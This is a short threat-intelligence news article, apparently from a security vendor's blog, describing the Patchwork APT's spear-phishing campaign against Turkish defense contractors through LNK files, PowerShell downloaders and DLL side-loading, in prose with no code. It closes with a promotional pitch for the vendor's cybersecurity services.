Patchwork APT Escalates Operations Targeting Turkish Defense Sector

The notorious threat actor known as Patchwork has launched a sophisticated spear-phishing campaign aimed at Turkish defense contractors, seeking to pilfer strategic intelligence. The campaign leverages malicious LNK files disguised as conference invitations, specifically targeting individuals interested in unmanned vehicle systems, indicating a potential geopolitical motive.

Key Takeaways

• Patchwork, also identified by multiple other aliases, is believed to be an Indian state-sponsored actor active since at least 2009.

• The group has expanded its targeting footprint to include Turkish defense firms, coinciding with deepening defense ties between Pakistan and Turkey and recent India-Pakistan military tensions.

• The attack chain begins with a malicious LNK file that executes PowerShell commands to download further payloads from a compromised server.

• The campaign utilizes a PDF lure mimicking an international conference on unmanned vehicle systems as a visual decoy.

• Recent activity shows an evolution in Patchwork's capabilities, moving from x64 DLL variants to x86 PE executables with enhanced command structures.

Sophisticated Attack Chain Unveiled

The campaign meticulously employs a five-stage execution chain, initiated by malicious LNK files. These files are distributed via phishing emails, cleverly disguised as invitations to a conference focused on unmanned vehicle systems. The primary objective is to gather strategic intelligence from entities involved in Turkey's burgeoning defense industry, including a manufacturer of precision-guided missile systems.

Geopolitical Motivations Suspected

Security researchers suggest the timing of this campaign aligns with significant geopolitical developments. Turkey's prominent position in the global UAV export market, its development of critical hypersonic missile capabilities, and its strengthening defense cooperation with Pakistan, all against a backdrop of heightened India-Pakistan tensions, are seen as potential drivers for Patchwork's renewed focus.

Evolution of Patchwork's Tactics

Patchwork, also known by aliases such as APT-C-09, Dropping Elephant, and Zinc Emerson, has a history of targeting entities in South Asia. However, this latest campaign signifies an expansion of its operational scope. The group has demonstrated a significant evolution in its capabilities, transitioning from x64 DLL variants to more advanced x86 PE executables. This diversification, coupled with enhanced command and control (C2) protocols that impersonate legitimate websites, highlights the actor's continued investment and development.

Technical Execution Details

The initial LNK file triggers PowerShell commands to download additional payloads from an external server. A PDF document, designed to look like an international conference invitation on unmanned vehicle systems, serves as a visual decoy. While the user is distracted by the PDF, the malicious execution chain silently proceeds in the background. This chain involves downloading a malicious DLL, which is then executed via DLL side-loading through a scheduled task. Ultimately, shellcode is deployed to conduct extensive reconnaissance, including taking screenshots and exfiltrating data back to the attacker-controlled server.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• Patchwork Targets Turkish Defense Firms with Spear-Phishing Using Malicious LNK Files, The Hacker News.